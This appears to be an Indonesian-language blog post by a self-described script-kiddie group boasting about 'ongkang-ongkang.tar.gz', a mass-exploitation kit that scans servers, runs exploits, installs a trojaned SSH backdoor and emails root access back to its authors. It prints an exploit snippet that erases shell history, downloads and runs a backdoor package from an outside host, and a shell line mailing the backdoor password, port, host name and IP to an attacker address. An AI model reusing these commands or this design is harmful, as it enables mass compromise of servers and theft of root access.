DHEGLENG NETWORK

Note: ra sah ngguyu sek, tak nyus solder kapok ngkow, qe3.

Dalam onderneming A Learner’s Comperhensive Dictionary of Indonesian, halaman 381, Mister Sutanto Admosumarto menuliskan, “ongkang-ongkang (vi) to sit with one leg dangling. Sebagai kepala desa dia hanya ongkang-ongkang; pegawainya yang bekerja keras. As a boss he just sits idly with one leg dangling, while his staff are working hard.”
Ongkang-ongkang mengandung gambaran duduk santai dengan sebelah kaki diangkat ditumpangkan ke kaki satunya, digoyang goyang kan. Lebih menjiwai lagi jika sambil ngrokok bas bus, disamping ada kopi starblack, tentu gak ketinggalan nyamikan. Ongkang-ongkang juga mengandung filosofi kemalasan, enak enak menuai hasil dari orang lain yang kerja keras. Sekalipun kerja keras itu hanyalah mengetikkan di shell “./exploit bla bla bla cuk cuk cuk”, tetap saja kerja keras, loh. Seperti pak lurah tadi, pak lurah itu pastilah orang pilihan sekampung, karena bisa jadi lurah. Bisa saja karena hartanya dan kepintarannya dia menjadi lurah. Lurah aka kepala desa bisa menyuruh orang lain kerja keras, dia sendiri ongkang ongkang saja menuai hasil kerja staffnya. Kerja keras para staff lurah biasanya juga mengandung nilai ekonomis. Yang bekerja keras mendapat keuntungan ekonomis langsung dari kerja kerasnya, lurahnya sendiri diuntungkan dari hasil kerja keras para staff nya, walaupun ketika para staff nya bekerja keras pak lurah hanya duduk ongkang-ongkang. Lalu apa hubungannya dengan judul di atas?. Apa pulak ada tar.gz nya? Bukankankan .tar.gz itu sebuah format file kompresi di lingkungan unix? Tetep pada moto: mudeng yo sokor gak mudeng yo silahkan kokor-kokor, qe3.

Berawal sekitar 5 tahun lalu

Idenya muncul dari cahcephoe. Kami adalah orang orang yang sibuk dengan pekerjaan, profesional mapan, kami juga skripkidis (scripts kidies) yang kadang kadang melakukan hal hal usil di sela sela kesibukan kami. Cahcephoe punya gagasan, kenapa kita enggak rakit saja tool tool hacking yang sudah ada, kita rakit jadi 1 paket, mudah digunakan, menyenangkan, dikasih skrip backdooring ongtomatis, dibagi bagikan ke anak anak lain. skripkidis lainya. Biarlah mereka kerja yang mengasikkan, mereka senang dapat panenan root, kitapun dikirimi hasil panenannya. Jadi kerja sama saling menguntungkan, simbiosis mutualisme, qe3. Kocap carito mangkono dirakitlah (bukan dibuat, jangan fitnah) sebuah tool cukup lengkap dikasih judul ongkang-ongkang.tar.gz. Intinya kita kita ini duduk ongkang-ongkang, orang lain kerja keras, tapi kita kita ini sama sama menikmati hasil dari yang kerja keras orang lain. Ini adalah kisah 5 tahun lalu, jadi tool itu di jaman sekarang ini mungkin sudah kurang efisien, tapi jaman dulu betul betul sangat efisien, qe3.

Ongkang-ongkang adalah sebuah konsep

ongkang-ongkang melakukan port scaning, melakukan analisis daemon service yang dijalankan server, mengecek apakah service itu sesuai yang kita cari, ngetes apakah service itu vulner (ada hole), jika ada akan dijalankan exploit sesuai untuknya, jika exploit berhasil mendapatkan root previladge, maka exploit akan otomatis melakukan donwload backdoor, menginstallnya, dan (ini yang paling penting), setelah backdoor diinstall script itu akan mengirim email ke si empunya, email itu isinya sebuah informasi yang berisi IP server, port yang dibuka untuk akses root, dan password root backdoor. Dikirim kemana? Ya tentu saja dikirim ke yang sedang lagi duduk ongkang-ongkang tadi.

Sruktur File Program

File file terdiri dari bagian bagian yang saling berkalitan. Umumnya ditulis dalam c, banyak sekali. Sebagian masih asli dalam c sebagaina sudah dikompile untuk menghemat ukuran file .tar.gz. File file ini umumnya hasil kopi paste dari “wong londo”, makanya jangan fitnah “kami” dengan kata author, disebut “merakit” masih boleh, sebatas karya ecek ecek rakitan, qe3. Code code di sini masih setengah jadi, untuk bisa benar benar efektive bisa jalan tergantung “kidies” yang akan memakainya, karena tidak langsung di sembarang kernel Linux ataupun kernel BSD lainnya, gak bisa tinggal ./exploit bla -bla, langsung jalan. Download ke server, sesuaikan sana sini, kompil ulang dan jalankan.

a. Scanning
Terdiri dari main.c atau root.c, yang jika dijalankan akan memanggil sub program gen.c , dan scan_a.c , scan_b.c , serta scan_c.c, yang nantinya juga akan memanggil sub program trycukcukcuk.c (cukcukcuk tergantung service yang akan ditest, misal tryftpd.c). File gen.c akan mengendalikan parameter counter ip dan parameter random ip yang sedang discan agar mengikuti aturan format penulisan nomor ip xxx.xxx.xxx.xxx dimana xxx nilainya max 255.

b. Evaluating
Di bagian scanning, program mencari IP yang “available” dan port service yang “terbuka”. Setelah itu di bagian evaluating ini program akan mengecek apakah port service yang terbuka itu sesuai dengan service yang masih memiliki vulnerability/hole. Ini 100% berdasar “respon text” dari server yang sedang dicek. Jika respon server memenuhi kriteria yang dianggap vulner server itu akan diexploiting. Lihat contoh tryssh.c ini. Sebagai contoh lain: jika server dhegleng.or.id jika discan di port 80 (web service/apache) server akan menghasilkan respon “Apa hayo, qe3″ maka tool ini tidak akan menggubris nya (juga tidak akan menggubris port 25, dan OS nya, masak OS nya Symbian?) walau mungkin sebenarnya memang ada hole. Spoofing respon server dari ports service itu tahun 2000 an sangat ampuh menghindari mass scanner yang lagi ngetrend (termasuk yang dibahas ini), karena pasti server akan dicuekin, qe3.
Jika bagian evaluating menghasilkan respon text yang tidak sesuai, maka program akan loop, cari server lainnya, cuk!.

c. Exploiting
Bagian exploting ini adalah bagian program yang paling seru, karena exploit yang sebenarnya di sini sedang dieksekusi. Mengeksekusi exploit ternyata paramaternya lumayan banyak, maka eksekusi ekploit di sini sangatlah tergantung paramaternya di bagian evaluating. Kita tidak cuman bisa ketik “./exploit” saja, dalam kenyataanya harus “./exploit -paramter1 -parameter2″ dan seterusnya. Ini semua tergantung dengan jenis service yang sedang running. Maka oleh sebab itu (hik hik kek pembawa makalah aja, qe3) antara bagian evaluating dan exploting harus klop banget kerja samanya. Sebagai contoh: evaluating yang dihasilkan oleh tryssh.c nantinya harus memberitahu kepada bagian exploiting supaya exploit dieksekusi sesuai dengan daftar targets di mana parameternya harus sesuai. Kalau tidak, ya hasil exploiting akan gagal, karena parameter akan menentukan address address sheelcode, letak memory, versi service (dalam hal ini ssh) yang sedang berjalan.

d. Backdooring
Bagian ini biasanya skrip skrip yang diselipkan di dalam code exploit. Backdoor banyak sekali muacamnya, puluhan, bahkan ratusan. Bakcdoor kala itu yang cukup bagus yang SSH based, gampang installnya dengan “sh” saja, salah satunya adalah shv4.tar.gz. Dalam shv4.tar.gz ada 4 file yang terdiri dari file file kompres juga, jadi kompress di dalam kompress. Adalah lib.tgz, conf.tgz, bin.tgz, dan setup (sh setup). “lib”, “config” dan “bin” berisi file file palsu yang akan menimpa file asli misalnya (hanya misal, tergantung backdoornya) “ls;w;ps;cat;wget;lynx;tar;gcc;netstat;du;top;etc”. Installnya tinggal ketik tar zxvf shv4.tar.gz dan “sh setup

” maka backdoor sudah diinstall, sekaligus dibersihkan materialnya dari server. Lihat contoh backdoor yang disisipkan di dalam exploit, ketika exploit berhasil mendapatkan root, backdoor otomatis di download dan diinstall. Lihat contoh ini, contoh lainnya buanyak buanget. Lihat baris di bawah ini :
….cut
void
shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd=”unset HISTFILE; lynx -source http://debbyzalina.com/exploits/tools/shv4.tar.gz > shv4.tar.gz;tar -zxvf shv4.tar.gz;cd shv4;./setup cyber2002x 5777;uname -a;id;exit;\n”;
int n;
…cutNah dengan skrip itu, ketika exploit samba menemukan server yang masih vulner, melakukan exploiting dan berhasil mendapatkan root previledge, maka secara otomatis exploit akan melakukan download backdoor, secara otomatis menginstallnya dan secara otomatis exit, untuk melanjutkan pencarian lagi. Skrip itu bisa dibikin lebih rapi di dalam c dengan fungsi “system (…….)”.

e. Emailing
Setelah tahap backdooring selesai, yah sudah semestinya tahap emailing akan tereksekusi dengan sendirinya, mengapa? Karena skrip setup (dieskekusi dengan perintah shell “sh”) mengandung sebuah skrip yang mengirimkan email ke “empu” nya. Kita memanfa`atkan perintah pengiriman email yang paling kuno di lingkungan sheel (mungkin kalian belum lahir kali ye, qe3) yaitu dengan perinah “mail

“. Di Linux dan BSD sama, di Ubuntu namanya “nail” keknya. Bagaimana ini bisa jalan? Ini contohnya:
./sh setup

jika $1 isinya password, $2 isinya port backdoor, ‘uname -a’ isinya nama host dan $MYIPADDR isinya IP target dan jika md5sum=deGleng@debbyzalina.com
maka:
echo “$1:$2:`uname -a`:`id`:$MYIPADDR” | mail $md5sum ,
artinya ya ngirim root ke kamu lengkap dengan password:port:nama host dan IP, ndes!
Dan skrip skrip itu semua ada di dalam file “setup”. Massexploit ini dibagi bagikan ke khalayah kidis (istilahnya “From Kidies to Kidies”) awal tahun 2000 an. Tahun 2004, jadi hampir 4 tahun dari sekarang, massexploit yang sudah di”uwik-uwik” ini telah menghasilkan kiriman root seperti ini.
Sayang kata kata sekitar 4 tahun lalu itu berkesan agak “emosional” karena situasi waktu itu, ada anak baru sesumbar dan menantang apakah kami bisa listing di alldas.org. Untungnya tidak kami tanggapi, qe3. Tetep cool, tetep pada motto “seseorang tidak lebih pinter dari yang lainnya yang ada adalah bahwa seseorang lebih dulu belajar dari yang lainnya”.Folder dan files
- Folder ongkang-ongkang/src
- File root.c
- File gen.c
- Fule scan.c
- Folder lengkap di sini

Tetap pada motto:
1. Artikel ini bukan untuk konsumsi “segala umur”
2. Mudeng yo sokor gak mudeng yo kokor kokor
3. Memberi pancing lebih baik daripada memberi ikan
4. Bukan seseorang lebih hebat dari yang lain, melainkan seseorang lebih dulu belajar dari yang lain.
5. Doesbeh koera, singtjolasdoes, singtarlasdoes, singlislasdoedoes (bahasa planet artinya sak karepmu sing ngartekke)

rgds
deGleng